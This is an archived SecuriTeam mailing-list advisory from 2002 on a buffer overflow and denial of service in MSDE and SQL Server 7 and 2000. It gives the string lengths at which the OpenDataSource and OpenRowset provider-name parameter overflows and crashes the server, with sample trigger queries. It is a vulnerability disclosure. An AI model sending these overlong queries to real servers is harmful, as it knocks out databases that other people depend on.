[NT] MSDE, SQL Server 7 & 2000 Adhoc Heterogeneous Queries Buffer Overflow and DoS
From: support@securiteam.comDate: 02/24/02
- Previous message: support@securiteam.com: "[NT] ScriptEase MiniWeb Server DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 24 Feb 2002 00:51:58 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
MSDE, SQL Server 7 & 2000 Adhoc Heterogeneous Queries Buffer Overflow and
DoS
------------------------------------------------------------------------
SUMMARY
A distributed query may access data from multiple heterogeneous data
sources, which can be stored either in the same or in a different
computer. Microsoft SQL Server supports distributed queries by using OLE
DB, the Microsoft specification of an application-programming interface
(API) for universal data access. Distributed queries provide SQL Server
users with access to:
- Distributed data stored in multiple computers that are running SQL
Server.
- Heterogeneous data stored in various relational and non-relational data
sources that can be accessed using an OLE DB provider.
You can reference heterogeneous OLE DB data sources in Transact-SQL
statements by:
- Linked servers , OpenQuery function.
- OpenDataSource and OpenRowset functions.
OpenDataSource and OpenRowset functions are accessible to all users and
contain an unchecked buffer in one of its parameters. The buffer overflow
and DoS problem occur when an overly long string is supplied in the
"provider name" parameter.
DETAILS
Vulnerable systems:
MSDE, SQL Server 7, SQL Server 2000 with all service packs and fixes
applied.
In SQL Server 7 overflow starts at character number 6819 and if the amount
of characters is >= 6918 the server will crash:
SELECT * FROM OpenDataSource('XXXXXXXXXXX...' ---> 6819 characters or
more,'')...nothing
SELECT * FROM OPENROWSET('XXXXXXXXXXX...' ---> 6819 characters or
more,'','')
In SQL Server 2000 overflow starts at character number 6887 and if the
amount of characters is >= 6998 the server will crash:
SELECT * FROM OpenDataSource('XXXXXXXXXXX...' ---> 6887 characters or
more,'')...nothing
SELECT * FROM OPENROWSET('XXXXXXXXXXX...' ---> 6887 characters or
more,'','')
ADDITIONAL INFORMATION
The information has been provided by <mailto:cesarc56@yahoo.com> c c.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] ScriptEase MiniWeb Server DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
